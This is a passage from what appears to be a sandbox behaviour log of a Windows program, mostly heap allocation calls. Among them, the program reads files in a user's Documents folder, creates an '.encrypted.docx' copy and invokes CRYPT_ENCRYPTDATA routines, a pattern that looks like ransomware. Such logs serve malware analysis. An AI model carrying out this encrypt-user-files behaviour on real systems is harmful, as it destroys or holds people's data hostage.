Size=0x50) returned 0x7f3688 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0033.109] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0033.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.encrypted.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hpn6id3ln1n.encrypted.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.112] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.112] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0xa628, lpOverlapped=0x0) returned 1 [0033.114] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa628) returned 0x945010 [0033.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa628) returned 0x94f640 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.116] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa628) returned 0x945010 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.116] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.116] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.117] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa628) returned 0x945010 [0033.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0033.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889730 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0033.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa628) returned 0x959c70 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.118] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.119] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.119] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da398 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.119] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.120] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0033.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.121] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) 